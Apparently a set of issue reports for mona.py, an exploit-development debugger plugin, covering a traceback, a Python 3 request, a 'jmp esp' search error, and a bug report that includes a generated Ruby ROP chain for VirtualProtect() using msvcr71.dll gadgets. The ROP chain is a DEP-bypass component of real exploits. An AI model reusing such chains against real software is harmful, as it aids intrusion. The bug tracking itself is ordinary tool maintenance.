File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5373, in getModulesToQuery
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5488, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 2493, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

Hi,

I used the latest version of Mona.py and had a bug when calculating the return address to virtualprotect ,
it forgot to calculate an add al,0EFh that will ocour before the virtual protect call.

Thanks for the helpful tool though,
Gadi

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

*** [ Ruby ] ***

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be
rop_gadgets = 
[
  0x7c373fda,  # POP EBP # RETN [msvcr71.dll] 
  0x7c373fda,  # skip 4 bytes [msvcr71.dll]
  0x7c376747,  # POP EAX # RETN [msvcr71.dll] 
  0xfffffdff,  # Value to negate, will become 0x00000201
  0x7c352155,  # NEG EAX # RETN [msvcr71.dll] 
  0x7c341748,  # POP EBX # RETN [msvcr71.dll] 
  0xffffffff,  #  
  0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll] 
  0x7c363cff,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
  0x7c344f8e,  # POP EDX # RETN [msvcr71.dll] 
  0xffffffc0,  # Value to negate, will become 0x00000040
  0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll] 
  0x7c34f7a0,  # POP ECX # RETN [msvcr71.dll] 
  0x7c38fd9f,  # &Writable location [msvcr71.dll]
  0x7c342953,  # POP EDI # RETN [msvcr71.dll] 
  0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
  0x7c36374d,  # POP ESI # RETN [msvcr71.dll] 
  0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
  0x7c34728e,  # POP EAX # RETN [msvcr71.dll] 
  0x7c37a140,  # ptr to &VirtualProtect() [IAT msvcr71.dll]   ---- BUG Error should be 7c37a151  ( will get eax to 0x7c37a140 when  add     al,0EFh; )
  0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
  0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")

MOna version :

$Revision: 545 $
$Id: mona.py 545 2014-02-22 22:46:02Z corelanc0d3r $
"""

VERSION = '2.0'
REV = filter(str.isdigit, '$Revision: 545 $')
IMM = '1.8'
DEBUGGERAPP = ''
arch = 32
win7mode = False

When opening a new issue, please fill out the following sections:

Expected behavior

Code is written in Python 3.

Actual behavior

Code is written in Python 2.7.

Steps to reproduce the problem

Check dependencies in README.md file.

Other useful information (mona version, debugger & debugger version, OS version, etc)

Python 2.7 is EOL as of 9 days ago, (01/01/2020).

See: https://pythonclock.org

Expected behavior

• Mona should provide the output of the instruction jmp esp upon executing !mona jmp -r esp

Actual behavior

• Mona errors out, like below
  

Steps to reproduce the problem

• Open Immunity debugger and load mona.py
• Search for jmp esp instruction with !mona jmp -r esp command and observe the output

Other useful information (mona version, debugger & debugger version, OS version, etc)

• Windows Version: XP
• Immunity Debugger Version: 1.85
• Mona Version: Latest Patch
• Python Version: 2.7.18
• Other mona commands work, !mona find -s '\xff\xe4' this works fine